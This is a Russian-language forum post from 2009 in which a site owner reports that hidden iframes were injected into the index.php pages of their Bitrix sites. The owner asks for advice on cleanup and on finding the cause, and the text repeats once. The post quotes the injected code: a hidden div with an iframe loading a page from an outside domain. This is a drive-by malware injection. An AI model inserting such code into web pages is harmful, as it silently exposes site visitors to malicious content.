emiljen
17-09-2009, 17:52
Здравствуйте!
Хотел поделиться с Вами проблемой и попросить помощи, может быть Вы с этим сталкивались.
Сегодня нами был обнаружен эксплойт на большинстве индексовых страниц(index.php) наших сайтов на VPS-сервере хостинга hc и на nichoste.
Эксплойт вида:
<div style="display:none"><iframe src="http://theanotherlife.ru:8080/index.php" width=497 height=546 ></iframe></div>
Сайты базируются на CMS Bitrix.
Дата изменения файлов показывает, что активность проявлялась вчера в районе 10 вечера на VPS и в 2-3 на никхосте. Техподдержка на никхосте не смогла посоветовать ничего вразумительного, сейчас отписался в нс.
Главные подозреваемые: битрикс, какой-нибудь из локальных кампов, имевших доступ к фтп.
Локальные компьютеры, имевшие доступ к фтп на VPS, сейчас проверяются всевозможными средствами, были изменены пароли к фтп и почищены все инексные страницы.
Что Вы могли посоветовать в данной ситуации?
Хотел поделиться с Вами проблемой и попросить помощи, может быть Вы с этим сталкивались.
Сегодня нами был обнаружен эксплойт на большинстве индексовых страниц(index.php) наших сайтов на VPS-сервере хостинга hc и на nichoste.
Эксплойт вида:
<div style="display:none"><iframe src="http://theanotherlife.ru:8080/index.php" width=497 height=546 ></iframe></div>
Сайты базируются на CMS Bitrix.
Дата изменения файлов показывает, что активность проявлялась вчера в районе 10 вечера на VPS и в 2-3 на никхосте. Техподдержка на никхосте не смогла посоветовать ничего вразумительного, сейчас отписался в нс.
Главные подозреваемые: битрикс, какой-нибудь из локальных кампов, имевших доступ к фтп.
Локальные компьютеры, имевшие доступ к фтп на VPS, сейчас проверяются всевозможными средствами, были изменены пароли к фтп и почищены все инексные страницы.
Что Вы могли посоветовать в данной ситуации?